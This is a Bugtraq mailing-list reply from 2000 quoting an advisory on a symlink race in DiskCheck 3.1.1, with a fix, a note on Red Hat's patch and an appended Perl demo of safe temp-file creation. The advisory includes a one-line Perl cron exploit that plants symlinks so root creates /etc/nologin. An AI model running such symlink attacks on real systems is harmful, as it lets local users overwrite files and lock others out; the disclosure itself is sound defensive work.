[16112] in bugtraq
Re: Diskcheck 3.1.1 Symlink Vulnerability
daemon@ATHENA.MIT.EDU (Stan Bubrouski)
Mon Aug 7 13:48:40 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.3.1.2.20000807114000.00b33b40@pop.crosswinds.net>
Date: Mon, 7 Aug 2000 11:41:49 -0400
Reply-To: Stan Bubrouski <secnet@CROSSWINDS.NET>
From: Stan Bubrouski <secnet@CROSSWINDS.NET>
X-To: "You, Jin-Ho" <jhyou@CHONNAM.CHONNAM.AC.KR>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <398BD1FD.BAEE3B70@chonnam.chonnam.ac.kr>
At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
>Diskcheck 3.1.1 Symlink Vulnerability
>
>1 Introduction
>
>DiskCheck is a Perl script that monitors how much space is available
>on your hard drive. Basically, it checks your drive space every
>hour and takes action based on the specifications in the config file
>/etc/diskcheck.conf.
>
>DiskCheck 3.1.1 is available from
>http://www.kaybee.org/~kirk/html/linux.html and
>RedHat Powertools 6.x.
>
>2 Vulnerability
>
>The command /etc/cron.hourly/diskcheck.pl is executed with root privilege
>every hour. It creates a temporary file whose default name,
>/tmp/diskusagealert.txt.<pid>, defined in /etc/diskcheck.conf,
>is predictable, and it is willing to follow symbolic links. This may allow
>malicious local users to create or overwrite arbitrarily named files.
>
>3 Exploit
>
>The following cron job creates the file, /etc/nologin.
>
>0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
> symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'
>
>4 Solution
>
>Relocate the temporary file into the directory where only root can create
>a file.
>
>Example)
>
>Edit /etc/diskcheck.conf
>
> $tempfile = '/var/local/diskusagealert.txt'
>
># ls -ld /var/local
>drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/
>
>
>You, Jin-Ho, jhyou@chonnam.ac.kr

This was reported on the list about a month ago and is fixed in Red Hat's
current rawhide, and in Red Hat Pinstripe (7.0 beta). I don't know of any
other distros that include it.

-Stan Bubrouski
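
The advisory quoted above fixes the problem by moving the temporary file to a root-only directory. As an added example (not part of either post and not DiskCheck's own code), the Perl below shows a complementary fix: exclusive creation, which refuses a pre-planted symlink at the predictable name. The helper `create_exclusive`, the scratch directory and the `protected-file` stand-in are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example (not DiskCheck's code): create a report temp file safely.
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);
use File::Temp qw(tempdir);

# O_NOFOLLOW is only available on platforms that define it; fall back to 0.
my $O_NOFOLLOW = eval { Fcntl::O_NOFOLLOW() } || 0;

# Hypothetical helper: open $path for writing only if the name is unused.
# O_CREAT|O_EXCL makes the open fail with EEXIST when the name is taken,
# including when it is taken by a symlink (even a dangling one).
sub create_exclusive {
    my ($path) = @_;
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_EXCL | $O_NOFOLLOW, 0600)
        or return;
    return $fh;
}

# Constructed demonstration, confined to a private scratch directory.
my $dir    = tempdir(CLEANUP => 1);
my $target = "$dir/protected-file";         # stands in for a system file
my $tmp    = "$dir/diskusagealert.txt.$$";  # predictable name, as in the advisory

symlink($target, $tmp) or die "symlink: $!";  # link already present at the name

# Vulnerable pattern: a plain open follows the link and creates the target.
open(my $bad, '>', $tmp) or die "open: $!";
close $bad;
print "plain open created target: ", (-e $target ? "yes" : "no"), "\n";
unlink $target;

# Hardened pattern: exclusive create refuses the occupied name.
my $fh = create_exclusive($tmp);
print "exclusive create on planted link: ",
      ($fh ? "opened" : "refused ($!)"), "\n";
print "target exists afterwards: ", (-e $target ? "yes" : "no"), "\n";

# Preferred: File::Temp picks an unpredictable name and opens it exclusively.
my $safe = File::Temp->new(TEMPLATE => 'diskusagealert.XXXXXXXX', DIR => $dir);
print {$safe} "disk usage report\n";
print "File::Temp name: ", $safe->filename, "\n";
```

A root-run job that must write under a world-writable directory should treat a refused exclusive create as an error to log and abort on, not retry with the same name.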